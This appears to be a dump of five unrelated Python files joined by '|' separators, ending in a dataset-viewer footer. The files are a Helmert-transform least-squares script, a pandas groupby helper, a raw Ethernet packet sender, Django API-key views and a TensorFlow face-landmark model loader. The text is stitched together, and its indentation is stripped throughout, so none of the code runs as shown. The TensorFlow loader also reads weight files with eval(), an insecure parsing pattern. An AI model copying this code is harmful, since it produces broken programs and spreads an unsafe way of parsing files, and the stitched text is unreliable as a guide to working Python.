b = load_sta("C:/Users/Adrian/Documents/NVI/HelmertTool/data/2020d.sta")
a = load_sta("C:/Users/Adrian/Documents/NVI/HelmertTool/data/2020d_off_0_0_10p_rate_0_0_0.sta")
n = len(a.index)
residuals = (a[["X", "Y", "Z"]] - b[["X", "Y", "Z"]])*1000
variances = (a[["X_sigma", "Y_sigma", "Z_sigma"]]*1000)**2 + (b[["X_sigma", "Y_sigma", "Z_sigma"]]*1000)**2
#%% Calculate translation parameters, seperate calculations
for dim in ["X", "Y", "Z"]:
X = np.ones((n,1))
y = np.array(residuals[dim]).reshape(n,1)
y_var = np.diag(variances[dim + "_sigma"])
o_par = ordinary_least_squares(X, y)
w_par, w_par_unsc = weighted_least_squares(X, y, y_var)
print(f"{dim} : {o_par}/{w_par}/{w_par_unsc['C0']} (par/weight par/unsc)")
#%%Calculate translation parameters, one calculation
X_list = []
y_list = []
y_var_list = []
for i, dim in enumerate(["X", "Y", "Z"]):
X_temp = np.zeros((n,3))
X_temp[:,i:i+1] = np.ones((n,1))
X_list.append(X_temp)
y_list.append(np.array(residuals[dim]).reshape(n,1))
y_var_list.append(np.array(variances[dim + "_sigma"]).reshape(n))
X = np.vstack(X_list)
y = np.vstack(y_list)
y_var = np.diag(np.hstack(y_var_list))
o_par = ordinary_least_squares(X, y)
w_par, w_par_unsc = weighted_least_squares(X, y, y_var)
print(o_par, w_par, w_par_unsc)
"""
Unweighted Transform: 55,30 13,95 6,65
Weighted Transform 51,54230329 63,59747675 58,64105015
Sigma 0,272189593 0,169984491 0,17453374
Chi-square(No translation) 99130 280280 147091
Chi-square(After) 63272 140302 34204
Note that chi-square is reduced.
""" |
from ..utils.groupby_func import groupby_func
def df_to_groupby(data, by, func):
'''Takes in a dataframe and returns it in a grouped by format.
data : dataframe
A pandas dataframe
by : str
The column by which the grouping is done
func : str
The function to be used for grouping by: 'median', 'mean', 'first',
'last', 'std', 'mode', 'max', 'min', 'sum', 'random', 'freq', 'string'.
'''
return groupby_func(data=data.groupby(by), func=func)
|
from socket import *
def send_packet(src, dst, eth_type, payload, interface = "eth0"):
"""Send raw Ethernet packet on interface."""
assert(len(src) == len(dst) == 6) # 48-bit ethernet addresses
assert(len(eth_type) == 2) # 16-bit ethernet type
s = socket(AF_PACKET, SOCK_RAW)
# From the docs: "For raw packet
# sockets the address is a tuple (ifname, proto [,pkttype [,hatype]])"
s.bind((interface, 0))
return s.send(src + dst + eth_type + payload)
if __name__ == "__main__":
print("Sent %d-byte Ethernet packet on eth0" %
send_packet("\xFE\xED\xFA\xCE\xBE\xEF",
"\xFE\xED\xFA\xCE\xBE\xEF",
"\x7A\x05",
"hello"))
|
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
#from django.contrib import messages
from apps.apies.models import Api
from apps.apies.forms import ApiForm
def clear_character_session(request):
del request.session['charpk']
del request.session['access']
del request.session['moderator']
@login_required
def apies(request):
api_form = ApiForm(request.POST or None, user=request.user)
if request.POST and api_form.is_valid():
api_form.save(request.user)
api_form = ApiForm(user=request.user)
char_apies = Api.objects.filter(
user=request.user,
accounttype__in=[Api.CHARACTER, Api.ACCOUNT],
)
corp_apies = Api.objects.filter(
user=request.user,
accounttype=Api.CORPORATION,
)
return render(
request,
"apies/apies.html",
{
"api_form": api_form,
"char_apies": char_apies,
"corp_apies": corp_apies
}
)
@login_required
def delete_api(request, pk):
api = get_object_or_404(Api, pk=pk, user=request.user)
api.delete_related()
api.delete()
if "charpk" in request.session:
clear_character_session(request)
return HttpResponseRedirect(reverse("apies"))
@login_required
def update_api(request, pk):
api = get_object_or_404(Api, pk=pk, user=request.user)
api.update()
if "charpk" in request.session:
clear_character_session(request)
return HttpResponseRedirect(reverse("apies"))
|
import tensorflow as tf
import json
import numpy
import os
import sys
params = {}
def load(filename, shape, dtype):
with open(filename, 'r') as f:
s = f.read()
d = eval(s)
t = tf.convert_to_tensor(d, dtype=dtype)
t = tf.reshape(t, shape)
return t
def loadAnNumpyArray(filename, shape, dtype):
with open(filename, 'r') as f:
s = f.read()
d = eval(s)
t = numpy.asarray(d, dtype=dtype)
t = numpy.reshape(t, shape)
return t
normalized = loadAnNumpyArray("normalized.json", (1,112,112,3), numpy.float32)
params["dense0"] = {}
params["dense0"]["conv0"] = {}
params["dense0"]["conv0"]["filters"] = load("dense0.conv0.filters.json", [3,3,3,32], tf.float32)
params["dense0"]["conv0"]["bias"] = load("dense0.conv0.bias.json", [32], tf.float32)
params["dense0"]["conv1"] = {}
params["dense0"]["conv1"]["depthwise_filter"] = load("dense0.conv1.depthwise_filter.json", [3,3,32,1], tf.float32)
params["dense0"]["conv1"]["pointwise_filter"] = load("dense0.conv1.pointwise_filter.json", [1,1,32,32], tf.float32)
params["dense0"]["conv1"]["bias"] = load("dense0.conv1.bias.json", [32], tf.float32)
params["dense0"]["conv2"] = {}
params["dense0"]["conv2"]["depthwise_filter"] = load("dense0.conv2.depthwise_filter.json", [3,3,32,1], tf.float32)
params["dense0"]["conv2"]["pointwise_filter"] = load("dense0.conv2.pointwise_filter.json", [1,1,32,32], tf.float32)
params["dense0"]["conv2"]["bias"] = load("dense0.conv2.bias.json", [32], tf.float32)
params["dense0"]["conv3"] = {}
params["dense0"]["conv3"]["depthwise_filter"] = load("dense0.conv3.depthwise_filter.json", [3,3,32,1], tf.float32)
params["dense0"]["conv3"]["pointwise_filter"] = load("dense0.conv3.pointwise_filter.json", [1,1,32,32], tf.float32)
params["dense0"]["conv3"]["bias"] = load("dense0.conv3.bias.json", [32], tf.float32)
params["dense1"] = {}
params["dense1"]["conv0"] = {}
params["dense1"]["conv0"]["depthwise_filter"] = load("dense1.conv0.depthwise_filter.json", [3,3,32,1], tf.float32)
params["dense1"]["conv0"]["pointwise_filter"] = load("dense1.conv0.pointwise_filter.json", [1,1,32,64], tf.float32)
params["dense1"]["conv0"]["bias"] = load("dense1.conv0.bias.json", [64], tf.float32)
params["dense1"]["conv1"] = {}
params["dense1"]["conv1"]["depthwise_filter"] = load("dense1.conv1.depthwise_filter.json", [3,3,64,1], tf.float32)
params["dense1"]["conv1"]["pointwise_filter"] = load("dense1.conv1.pointwise_filter.json", [1,1,64,64], tf.float32)
params["dense1"]["conv1"]["bias"] = load("dense1.conv1.bias.json", [64], tf.float32)
params["dense1"]["conv2"] = {}
params["dense1"]["conv2"]["depthwise_filter"] = load("dense1.conv2.depthwise_filter.json", [3,3,64,1], tf.float32)
params["dense1"]["conv2"]["pointwise_filter"] = load("dense1.conv2.pointwise_filter.json", [1,1,64,64], tf.float32)
params["dense1"]["conv2"]["bias"] = load("dense1.conv2.bias.json", [64], tf.float32)
params["dense1"]["conv3"] = {}
params["dense1"]["conv3"]["depthwise_filter"] = load("dense1.conv3.depthwise_filter.json", [3,3,64,1], tf.float32)
params["dense1"]["conv3"]["pointwise_filter"] = load("dense1.conv3.pointwise_filter.json", [1,1,64,64], tf.float32)
params["dense1"]["conv3"]["bias"] = load("dense1.conv3.bias.json", [64], tf.float32)
params["dense2"] = {}
params["dense2"]["conv0"] = {}
params["dense2"]["conv0"]["depthwise_filter"] = load("dense2.conv0.depthwise_filter.json", [3,3,64,1], tf.float32)
params["dense2"]["conv0"]["pointwise_filter"] = load("dense2.conv0.pointwise_filter.json", [1,1,64,128], tf.float32)
params["dense2"]["conv0"]["bias"] = load("dense2.conv0.bias.json", [128], tf.float32)
params["dense2"]["conv1"] = {}
params["dense2"]["conv1"]["depthwise_filter"] = load("dense2.conv1.depthwise_filter.json", [3,3,128,1], tf.float32)
params["dense2"]["conv1"]["pointwise_filter"] = load("dense2.conv1.pointwise_filter.json", [1,1,128,128], tf.float32)
params["dense2"]["conv1"]["bias"] = load("dense2.conv1.bias.json", [128], tf.float32)
params["dense2"]["conv2"] = {}
params["dense2"]["conv2"]["depthwise_filter"] = load("dense2.conv2.depthwise_filter.json", [3,3,128,1], tf.float32)
params["dense2"]["conv2"]["pointwise_filter"] = load("dense2.conv2.pointwise_filter.json", [1,1,128,128], tf.float32)
params["dense2"]["conv2"]["bias"] = load("dense2.conv2.bias.json", [128], tf.float32)
params["dense2"]["conv3"] = {}
params["dense2"]["conv3"]["depthwise_filter"] = load("dense2.conv3.depthwise_filter.json", [3,3,128,1], tf.float32)
params["dense2"]["conv3"]["pointwise_filter"] = load("dense2.conv3.pointwise_filter.json", [1,1,128,128], tf.float32)
params["dense2"]["conv3"]["bias"] = load("dense2.conv3.bias.json", [128], tf.float32)
params["dense3"] = {}
params["dense3"]["conv0"] = {}
params["dense3"]["conv0"]["depthwise_filter"] = load("dense3.conv0.depthwise_filter.json", [3,3,128,1], tf.float32)
params["dense3"]["conv0"]["pointwise_filter"] = load("dense3.conv0.pointwise_filter.json", [1,1,128,256], tf.float32)
params["dense3"]["conv0"]["bias"] = load("dense3.conv0.bias.json", [256], tf.float32)
params["dense3"]["conv1"] = {}
params["dense3"]["conv1"]["depthwise_filter"] = load("dense3.conv1.depthwise_filter.json", [3,3,256,1], tf.float32)
params["dense3"]["conv1"]["pointwise_filter"] = load("dense3.conv1.pointwise_filter.json", [1,1,256,256], tf.float32)
params["dense3"]["conv1"]["bias"] = load("dense3.conv1.bias.json", [256], tf.float32)
params["dense3"]["conv2"] = {}
params["dense3"]["conv2"]["depthwise_filter"] = load("dense3.conv2.depthwise_filter.json", [3,3,256,1], tf.float32)
params["dense3"]["conv2"]["pointwise_filter"] = load("dense3.conv2.pointwise_filter.json", [1,1,256,256], tf.float32)
params["dense3"]["conv2"]["bias"] = load("dense3.conv2.bias.json", [256], tf.float32)
params["dense3"]["conv3"] = {}
params["dense3"]["conv3"]["depthwise_filter"] = load("dense3.conv3.depthwise_filter.json", [3,3,256,1], tf.float32)
params["dense3"]["conv3"]["pointwise_filter"] = load("dense3.conv3.pointwise_filter.json", [1,1,256,256], tf.float32)
params["dense3"]["conv3"]["bias"] = load("dense3.conv3.bias.json", [256], tf.float32)
params["fc"] = {}
params["fc"]["weights"] = load("weights.json", [256,136], tf.float32)
params["fc"]["bias"] = load("bias.json", [136], tf.float32)
def denseLayer(inp, dense, isFirstLayer=False):
if isFirstLayer:
out1 = tf.math.add(
tf.nn.conv2d(inp, dense["conv0"]["filters"], [1,2,2,1], 'SAME'),
dense["conv0"]["bias"])
else:
out1 = tf.math.add(
tf.nn.separable_conv2d(
inp, dense["conv0"]["depthwise_filter"], dense["conv0"]["pointwise_filter"],
[1,2,2,1], 'SAME'),
dense["conv0"]["bias"])
out1 = tf.nn.relu(out1)
out2 = tf.math.add(
tf.nn.separable_conv2d(
out1, dense["conv1"]["depthwise_filter"], dense["conv1"]["pointwise_filter"],
[1,1,1,1], 'SAME'),
dense["conv1"]["bias"])
out3 = tf.math.add(
tf.nn.separable_conv2d(
tf.nn.relu(tf.math.add(out1, out2)),
dense["conv2"]["depthwise_filter"], dense["conv2"]["pointwise_filter"],
[1,1,1,1], 'SAME'),
dense["conv2"]["bias"])
out4 = tf.math.add(
tf.nn.separable_conv2d(
tf.nn.relu(tf.math.add(out1, tf.math.add(out2, out3))),
dense["conv3"]["depthwise_filter"], dense["conv3"]["pointwise_filter"],
[1,1,1,1], 'SAME'),
dense["conv3"]["bias"])
return tf.nn.relu(tf.math.add(out1, tf.math.add(out2, tf.math.add(out3, out4))))
inp = tf.placeholder(tf.float32, [1,112,112,3], name='input')
out = denseLayer(inp, params["dense0"], True)
out = denseLayer(out, params["dense1"])
out = denseLayer(out, params["dense2"])
out = denseLayer(out, params["dense3"])
out = tf.nn.avg_pool(out, [1,7,7,1], [1,2,2,1], 'VALID')
out = tf.math.add(
tf.matmul(
tf.reshape(out, [tf.shape(out)[0], -1]),
params["fc"]["weights"]),
params["fc"]["bias"], 'output')
if len(sys.argv[1:]) > 0:
modelName = sys.argv[1]
else:
modelName = "face-api-landmarksnet"
with tf.Session() as sess:
print(sess.run(out, feed_dict={inp: normalized}))
# Use TF to save the graph model instead of Keras save model to load it in Golang
builder = tf.saved_model.builder.SavedModelBuilder(modelName)
# Tag the model, required for Go
builder.add_meta_graph_and_variables(sess, ["myTag"])
builder.save()
sess.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.